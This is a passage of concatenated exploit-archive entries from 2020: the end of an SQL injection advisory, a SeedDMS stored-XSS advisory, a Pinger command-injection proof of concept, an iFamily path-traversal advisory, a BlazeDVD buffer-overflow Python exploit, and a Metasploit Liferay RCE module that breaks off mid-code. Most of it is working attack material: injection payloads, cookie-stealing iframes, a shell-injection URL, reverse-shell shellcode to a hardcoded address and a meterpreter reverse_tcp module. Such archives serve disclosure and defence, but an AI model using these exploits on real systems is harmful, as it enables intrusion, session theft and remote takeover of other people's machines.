src=https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId=%27-1%20order%20by%205--%20> <iframe src=https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId=%27-1%20union select 1,2,3,4,@@version--%20> <iframe src=https://macs-cms.localhost:8080/index.php/main/cms/deleteUser?userId=%27-1%20order%20by%205--%20> <iframe src=https://macs-cms.localhost:8080/index.php/main/cms/deleteUser?userId=%27-1%20union select 1,2,3,4,@@version--%20> </body></head> </html> --- PoC Session Logs [GET] --- https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId='-1 order by 5-- Host: macs-cms.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Cookie: __utma=72517782.1164807459.1586620290.1586620290.1586620290.1; Upgrade-Insecure-Requests: 1 - GET: HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Content-Length: 53 --- [SQL Error Exception Logs] --- SQLSTATE[HY000]: General error: 1 near "1": syntax error - Error executing SQL statement SQLSTATE[HY000]: General error: 1 unrecognized token: "''';" - Error executing SQL statement SQLSTATE[HY000]: General error: 1 1st ORDER BY term out of range - should be between 1 and 5 - 5.0.12 'pwnd This page was created in 1.5665068626404 seconds Security Risk: ============== 1.1 & 1.2 the security risk of the client-side cross site scripting web vulnerabilities in the search and email reset function are estimated as medium. 1.3 The security risk of the remote sql injection web vulnerabilities in the id parameters on delete are estimated as high. Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM

# Title: SeedDMS 5.1.18 - Persistent Cross-Site Scripting # Author: Vulnerability Laboratory # Date: 2020-04-15 # Vendor: https://www.seeddms.org # Software Link: https://www.seeddms.org/index.php?id=7 # CVE: N/A Document Title: =============== SeedDMS v5.1.18 - Multiple Persistent Web Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2209 Release Date: ============= 2020-04-15 Vulnerability Laboratory ID (VL-ID): ==================================== 2209 Common Vulnerability Scoring System: ==================================== 4.3 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 1.000€ - 2.000€ Product & Service Introduction: =============================== SeedDMS is a free document management system with an easy to use web based user interface. It is based on PHP and MySQL or sqlite3 and runs on Linux, MacOS and Windows. Many years of development has made it a mature, powerful and enterprise ready platform for sharing and storing documents. It's fully compatible with its predecessor LetoDMS. (Copy of the Homepage: https://www.seeddms.org/index.php?id=2 & https://www.seeddms.org/index.php?id=7 ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple persistent vulnerabilities in the SeedDMS v5.1.16 & v5.1.18 web-application. Affected Product(s): ==================== Uwe Steinmann Product: SeedDMS - Content Management System v4.3.37, v5.0.13, v5.1.14, v5.1.16, v5.1.18 and v6.0.7 Vulnerability Disclosure Timeline: ================================== 2020-04-15: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted authentication (user/moderator) - User privileges User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ Multiple persistent cross site web vulnerabilities has been discovered in the SeedDMS v4.3.37, v5.0.13, v5.1.14 and v6.0.7 web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent cross site scripting web vulnerabilities are located in the `name` and `comment` parameter of the `AddEvent.php` file. Remote attackers are able to add an own event via op.AddEvent with malicious script codes. The request method to inject is POST and the attack vector is located on the application-side. After the inject the execution occurs in the admin panel within the `Log Management` - `Webdav` and `Web` on view. The content of the comment and name is unescaped pushed inside of the logs with a html/js template. Thus allows an attacker to remotly exploit the issue by a simple post inject from outside with lower privileges. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected or connected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] op.AddEvent (AddEvent.php) Vulnerable Parameter(s): [+] name [+] comment Affected Module(s): [+] Log Management (out.LogManagement.php) Proof of Concept (PoC): ======================= The persistent web vulnerability can be exploited by remote attackers with low privileged web-application user account and low user interaction. For security demonstration or to reproduce the security web vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Start your local webbrowser and tamper the http protocol session 2. Open the AddEvent.php and add a new event 3. Insert your script code test payload inside the Name or Comments path 4. Save or submit the entry with error Note: Now the web and webdav log has captured the insert or erro 5. Now wait until the administrator previews in the log management the web or webdav view function 6. Successful reproduce of the persistent web vulnerability! PoC: Vulnerable Source (Log Management - View) <pre>Apr 13 19:23:22 [info] admin (localhost) op.RemoveLog ?logname=20200413.log Apr 13 19:29:53 [info] admin (localhost) op.AddEvent ?name="<iframe src="evil.source" onload="alert(document.cookie)"></iframe> &comment=<iframe src="evil.source" onload="alert(document.cookie)"></iframe>&from=1586728800&to=1586815199 </pre> PoC: Payload >"<iframe%20src=evil.source%20onload=alert(document.cookie)></iframe> --- PoC Session Logs (POST) --- https://SeedDMS.localhost:8080/out/out.AddEvent.php Host: SeedDMS.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: https://SeedDMS.localhost:8080/out/out.Calendar.php?mode=y Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 - GET: HTTP/1.1 200 OK Server: Apache/2.4.25 (Debian) Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2973 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive - https://SeedDMS.localhost:8080/op/op.AddEvent.php Host: SeedDMS.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 356 Origin: https://SeedDMS.localhost:8080 Connection: keep-alive Referer: https://SeedDMS.localhost:8080/out/out.AddEvent.php Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 from=2020-04-13&to=2020-04-13 &name=>"<iframe src=evil.source onload=alert(document.cookie)></iframe>&comment=>"<iframe src=evil.source onload=alert(document.cookie)></iframe> - POST: HTTP/1.1 302 Found Server: Apache/2.4.25 (Debian) Location: ../out/out.Calendar.php?mode=w&day=13&year=2020&month=04 Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Note: Injection Point via Calender op.AddEvent Name & Comment --- PoC Session Logs (GET) --- https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname=20200413.log Host: SeedDMS.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br X-Requested-With: XMLHttpRequest Connection: keep-alive Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 - GET: HTTP/1.1 200 OK Server: Apache/2.4.25 (Debian) Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 273 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 - https://SeedDMS.localhost:8080/out/evil.source Host: SeedDMS.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 Upgrade-Insecure-Requests: 1 - GET: HTTP/1.1 302 Found Server: Apache/2.4.25 (Debian) Location: /out/out.ViewFolder.php Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Note: Execution Point via Log Management (AP) on Webdav View or Web View Reference(s): https://SeedDMS.localhost:8080/ https://SeedDMS.localhost:8080/op/op.AddEvent.php https://SeedDMS.localhost:8080/out/out.ViewFolder.php https://SeedDMS.localhost:8080/out/out.AddEvent.php https://SeedDMS.localhost:8080/out/out.LogManagement.php https://SeedDMS.localhost:8080/out/out.Calendar.php?mode= https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname= Solution - Fix & Patch: ======================= 1. Parse and escape the name and comment input field on transmit to sanitize 2. Filter and restrict the input field of the name and comments parameter for special chars to prevent injects 3. Parse the output location of all web and webdav logfiles to prevent the execution point Security Risk: ============== The security risk of the persistent cross site web vulnerabilities in the seeddms web-application are estimated as medium. Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM

# Title: Pinger 1.0 - Remote Code Execution # Date: 2020-04-13 # Author: Milad Karimi # Vendor Homepage: https://github.com/wcchandler/pinger # Software Link: https://github.com/wcchandler/pinger # Tested on: windows 10 , firefox # Version: 1.0 # CVE : N/A ================================================================================ Pinger 1.0 - Simple Pinging Webapp Remote Code Execution ================================================================================ # Vendor Homepage: https://github.com/wcchandler/pinger # Software Link: https://github.com/wcchandler/pinger # Date: 2020.04.13 # Author: Milad Karimi # Tested on: windows 10 , firefox # Version: 1.0 # CVE : N/A ================================================================================ # Description: simple, easy to use jQuery frontend to php backend that pings various devices and changes colors from green to red depending on if device is up or down. # PoC : http://localhost/pinger/ping.php?ping=;echo '<?php phpinfo(); ?>' >info.php http://localhost/pinger/ping.php?socket=;echo '<?php phpinfo(); ?>' >info.php # Vulnerabile code: if(isset($_GET['ping'])){ // if this is ever noticably slower, i'll pass it stuff when called // change the good.xml to config.xml, good is what I use at $WORK $xml = simplexml_load_file("config.xml"); //$xml = simplexml_load_file("good.xml"); if($_GET['ping'] == ""){ $host = "127.0.0.1"; }else{ $host = $_GET['ping']; } $out = trim(shell_exec('ping -n -q -c 1 -w '.$xml->backend->timeout .' '.$host.' | grep received | awk \'{print $4}\'')); $id = str_replace('.','_',$host); if(($out == "1") || ($out == "0")){ echo json_encode(array("id"=>"h$id","res"=>"$out")); }else{ ## if it returns nothing, assume network is messed up echo json_encode(array("id"=>"h$id","res"=>"0")); } } if(isset($_GET['socket'])){ $xml = simplexml_load_file("config.xml"); //$xml = simplexml_load_file("good.xml"); if($_GET['socket'] == ""){ $host = "127.0.0.1 80"; }else{ $host = str_replace(':',' ',$_GET['socket']); } $out = shell_exec('nc -v -z -w '.$xml->backend->timeout.' '.$host.' 2>&1'); $id = str_replace('.','_',$host); $id = str_replace(' ','_',$id); if(preg_match("/succeeded/",$out)){ echo json_encode(array("id"=>"h$id","res"=>"1")); }else{ ## if it returns nothing, assume network is messed up echo json_encode(array("id"=>"h$id","res"=>"0")); } } ?>

# Title: File Transfer iFamily 2.1 - Directory Traversal # Author: Vulnerability Laboratory # Date: 2020-04-15 # Software Link: http://www.dedecms.com/products/dedecms/downloads/ # CVE: N/A Document Title: =============== File Transfer iFamily v2.1 - Directory Traversal Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2199 Release Date: ============= 2020-04-14 Vulnerability Laboratory ID (VL-ID): ==================================== 2199 Common Vulnerability Scoring System: ==================================== 7.1 Vulnerability Class: ==================== Directory- or Path-Traversal Current Estimated Price: ======================== 1.000€ - 2.000€ Product & Service Introduction: =============================== Send photos, videos and documents to other devices without Internet. A complete application to exchange files wirelessly between devices. It uses the Multipeer Connectivity Framework to search and connect to available devices, without the need of internet connection or any kind of server and database. (Copy of the Homepage: https://apps.apple.com/us/app/file-transfer-ifamily-files-photo-video-documents-wifi/id957971575 ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the official File Transfer iFamily v2.1 ios mobile application. Affected Product(s): ==================== DONG JOO CHO Product: File Transfer iFamily v2.1 - iOS Mobile Web Application Vulnerability Disclosure Timeline: ================================== 2020-04-14: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== High Authentication Type: ==================== Pre auth - no privileges User Interaction: ================= No User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ A directory traversal web vulnerability has been discovered in the official File Transfer iFamily v2.1 ios mobile application. The vulnerability allows remote attackers to change the application path in performed requests to compromise the local application or file-system of a mobile device. Attackers are for example able to request environment variables or a sensitive system path. The directory-traversal web vulnerability is located in the main application path request performed via GET method. Attackers are able to request for example the local ./etc/ path of the web-server by changing the local path in the performed request itself. In a first request the attack changes the path, the host redirects to complete the adress with "..". Then the attacker just attaches a final slash to its request and the path can be accessed via web-browser to download local files. Exploitation of the directory traversal web vulnerability requires no privileged web-application user account or user interaction. Successful exploitation of the vulnerability results in information leaking by unauthorized file access and mobile application compromise. Proof of Concept (PoC): ======================= The directory traversal vulnerability can be exploited by attackers with access to the wifi interface in a local network without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: Exploitation http://localhost/../../../../../../../../../../../../../../../../../../../../../../ http://localhost//../ --- PoC Session Logs [GET]] --- http://localhost/../../../../../../../../../../../../../../../../../../../../../../ Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Upgrade-Insecure-Requests: 1 - GET: HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 2521 - http://localhost../etc/ Host: localhost.. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Upgrade-Insecure-Requests: 1 - add slash to correct host adress (/.././) http://localhost/./ Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Upgrade-Insecure-Requests: 1 - Access granted http://localhost/../../../../../../../../../../../../../../../../../../../../../../ GET: HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 2521 Solution - Fix & Patch: ======================= The vulnerability can be patched by a restriction of the visible and accessable ./etc/ path in the app container. Disallow path changes in the client-side get method requests and validate them securely. Security Risk: ============== The security risk of the directory travsersal web vulnerability in the ios mobile application is estimated as high. Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™

# Exploit Title: BlazeDVD 7.0.2 - Buffer Overflow (SEH) # Date: 2020-04-15 # Exploit Author: areyou1or0 <Busra Demir> # Software Link: http://www.blazevideo.com/dvd-player/free-dvd-player.html # Version: 7.0.2 # Tested on: Windows 7 Pro x86 #!/usr/bin/python file = "exploit.plf" offset ="A"*(612-4) nseh = "\xeb\x1e\x90\x90" seh = "\x34\x31\x02\x64" nops = "\x90" * 24 # msfvenom -p windows/shell_reverse_tcp LHOST=3D192.168.8.121 LPORT=8888= -f python -e x86/alpha_mixed -b '\x00\x0a\x0d\xff' shellcode = "" shellcode += "\x89\xe2\xda\xcc\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a" shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37" shellcode += "\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41" shellcode += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" shellcode += "\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x69\x78\x4e\x62" shellcode += "\x53\x30\x63\x30\x45\x50\x45\x30\x6f\x79\x7a\x45\x46" shellcode += "\x51\x79\x50\x73\x54\x4c\x4b\x76\x30\x66\x50\x6e\x6b" shellcode += "\x66\x32\x74\x4c\x6c\x4b\x51\x42\x72\x34\x4c\x4b\x34" shellcode += "\x32\x31\x38\x76\x6f\x6c\x77\x61\x5a\x47\x56\x66\x51" shellcode += "\x6b\x4f\x6e\x4c\x75\x6c\x65\x31\x33\x4c\x64\x42\x64" shellcode += "\x6c\x31\x30\x5a\x61\x38\x4f\x64\x4d\x66\x61\x7a\x67" shellcode += "\x49\x72\x6a\x52\x71\x42\x30\x57\x6c\x4b\x53\x62\x36" shellcode += "\x70\x6e\x6b\x30\x4a\x45\x6c\x6c\x4b\x32\x6c\x37\x61" shellcode += "\x43\x48\x6a\x43\x31\x58\x55\x51\x6b\x61\x32\x71\x4c" shellcode += "\x4b\x33\x69\x47\x50\x75\x51\x6a\x73\x4c\x4b\x47\x39" shellcode += "\x72\x38\x4d\x33\x56\x5a\x30\x49\x4e\x6b\x57\x44\x6c" shellcode += "\x4b\x43\x31\x7a\x76\x55\x61\x79\x6f\x4e\x4c\x6a\x61" shellcode += "\x78\x4f\x54\x4d\x33\x31\x58\x47\x54\x78\x59\x70\x44" shellcode += "\x35\x6b\x46\x75\x53\x63\x4d\x48\x78\x75\x6b\x51\x6d" shellcode += "\x46\x44\x74\x35\x6b\x54\x72\x78\x4c\x4b\x70\x58\x45" shellcode += "\x74\x43\x31\x79\x43\x50\x66\x4c\x4b\x74\x4c\x32\x6b" shellcode += "\x6e\x6b\x52\x78\x47\x6c\x46\x61\x69\x43\x6c\x4b\x47" shellcode += "\x74\x6c\x4b\x37\x71\x4a\x70\x6d\x59\x30\x44\x46\x44" shellcode += "\x44\x64\x33\x6b\x71\x4b\x65\x31\x43\x69\x71\x4a\x52" shellcode += "\x71\x79\x6f\x69\x70\x51\x4f\x51\x4f\x51\x4a\x4c\x4b" shellcode += "\x57\x62\x58\x6b\x4e\x6d\x63\x6d\x35\x38\x55\x63\x64" shellcode += "\x72\x43\x30\x65\x50\x75\x38\x64\x37\x43\x43\x44\x72" shellcode += "\x43\x6f\x42\x74\x52\x48\x50\x4c\x71\x67\x67\x56\x44" shellcode += "\x47\x59\x6f\x69\x45\x68\x38\x7a\x30\x37\x71\x63\x30" shellcode += "\x63\x30\x46\x49\x6f\x34\x71\x44\x42\x70\x32\x48\x56" shellcode += "\x49\x6d\x50\x42\x4b\x57\x70\x69\x6f\x49\x45\x56\x30" shellcode += "\x50\x50\x36\x30\x30\x50\x33\x70\x66\x30\x67\x30\x76" shellcode += "\x30\x32\x48\x4a\x4a\x54\x4f\x39\x4f\x4d\x30\x39\x6f" shellcode += "\x49\x45\x6e\x77\x42\x4a\x63\x35\x30\x68\x69\x50\x6e" shellcode += "\x48\x46\x68\x61\x69\x62\x48\x34\x42\x63\x30\x65\x72" shellcode += "\x6f\x48\x4f\x79\x4a\x46\x62\x4a\x46\x70\x52\x76\x52" shellcode += "\x77\x65\x38\x4d\x49\x4d\x75\x71\x64\x70\x61\x4b\x4f" shellcode += "\x58\x55\x4c\x45\x4f\x30\x34\x34\x54\x4c\x6b\x4f\x70" shellcode += "\x4e\x34\x48\x63\x45\x5a\x4c\x42\x48\x6a\x50\x68\x35" shellcode += "\x4c\x62\x32\x76\x39\x6f\x5a\x75\x63\x58\x61\x73\x32" shellcode += "\x4d\x63\x54\x57\x70\x4f\x79\x38\x63\x52\x77\x73\x67" shellcode += "\x62\x77\x30\x31\x7a\x56\x63\x5a\x67\x62\x71\x49\x33" shellcode += "\x66\x79\x72\x59\x6d\x35\x36\x58\x47\x30\x44\x67\x54" shellcode += "\x37\x4c\x75\x51\x46\x61\x6c\x4d\x37\x34\x64\x64\x66" shellcode += "\x70\x7a\x66\x75\x50\x52\x64\x32\x74\x76\x30\x56\x36" shellcode += "\x63\x66\x46\x36\x73\x76\x71\x46\x70\x4e\x30\x56\x76" shellcode += "\x36\x51\x43\x51\x46\x50\x68\x71\x69\x48\x4c\x57\x4f" shellcode += "\x6e\x66\x69\x6f\x6a\x75\x4b\x39\x79\x70\x42\x6e\x33" shellcode += "\x66\x47\x36\x79\x6f\x36\x50\x53\x58\x76\x68\x4c\x47" shellcode += "\x57\x6d\x31\x70\x59\x6f\x6a\x75\x4f\x4b\x6c\x30\x58" shellcode += "\x35\x79\x32\x72\x76\x53\x58\x4f\x56\x6d\x45\x6f\x4d" shellcode += "\x6d\x4d\x79\x6f\x4a\x75\x55\x6c\x34\x46\x31\x6c\x56" shellcode += "\x6a\x4b\x30\x59\x6b\x6d\x30\x31\x65\x66\x65\x6d\x6b" shellcode += "\x33\x77\x35\x43\x53\x42\x72\x4f\x50\x6a\x37\x70\x61" shellcode += "\x43\x49\x6f\x68\x55\x41\x41" buffer = offset + nseh + seh + nops + shellcode f = open(file,'w') f.write(buffer) f.close()

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::Java::HTTP::ClassLoader include Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super(update_info(info, 'Name' => 'Liferay Portal Java Unmarshalling via JSONWS RCE', 'Description' => %q{ This module exploits a Java unmarshalling vulnerability via JSONWS in Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1 GA2 to execute code as the Liferay user. Tested against 7.2.0 GA1. }, 'Author' => [ 'Markus Wulftange', # Discovery 'Thomas Etrillard', # PoC 'wvu' # Module ], 'References' => [ ['CVE', '2020-7961'], ['URL', 'https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html'], ['URL', 'https://www.synacktiv.com/posts/pentest/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html'], ['URL', 'https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271'] ], 'DisclosureDate' => '2019-11-25', # Vendor advisory 'License' => MSF_LICENSE, 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Privileged' => false, 'Targets' => [ ['Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2', {}] ], 'DefaultTarget' => 0, 'DefaultOptions' => {'PAYLOAD' => 'java/meterpreter/reverse_tcp'}, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } )) register_options([ Opt::RPORT(8080), OptString.new('TARGETURI', [true, 'Base path', '/']) ]) end def check # GET / response contains a Liferay-Portal header with version information res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) ) unless res return CheckCode::Unknown('Target did not respond to check request.') end unless res.headers['Liferay-Portal'] return CheckCode::Unknown( 'Target did not respond with Liferay-Portal header.' ) end =begin Building the Liferay-Portal header: https://github.com/liferay/liferay-portal/blob/master/portal-kernel/src/com/liferay/portal/kernel/util/ReleaseInfo.java Liferay-Portal header data: https://github.com/liferay/liferay-portal/blob/master/release.properties Example GET / response: HTTP/1.1 200 [snip] Liferay-Portal: Liferay Community Edition Portal 7.2.0 CE GA1 (Mueller / Build 7200 / June 4, 2019) [snip] =end version, build = res.headers['Liferay-Portal'].scan( /^Liferay.*Portal ([\d.]+.*GA\d+).*Build (\d+)/ ).flatten unless version && (build = Integer(build) rescue nil) return CheckCode::Detected( 'Target did not respond with Liferay version and build.' ) end # XXX: Liferay versions older than 7.2.1 GA2 (build 7201) "may" be unpatched if build < 7201 return CheckCode::Appears( "Liferay #{version} MAY be a vulnerable version. Please verify." ) end CheckCode::Safe("Liferay #{version} is NOT a vulnerable version.") end def exploit # NOTE: Automatic check is implemented by the AutoCheck mixin super # Start our HTTP server to provide remote classloading @classloader_uri = start_service unless @classloader_uri fail_with(Failure::BadConfig, 'Could not start remote classloader server') end print_good("Started remote classloader server at #{@classloader_uri}") # Send our remote classloader gadget to the target, triggering the vuln send_request_gadget( normalize_uri(target_uri.path, '/api/jsonws/expandocolumn/update-column'), # Required POST parameters for /api/jsonws/expandocolumn/update-column: # https://github.com/liferay/liferay-portal/blob/master/portal-impl/src/com/liferay/portlet/expando/service/impl/ExpandoColumnServiceImpl.java 'columnId' => rand(8..42), # Randomize for "evasion" 'name' => rand(8..42), # 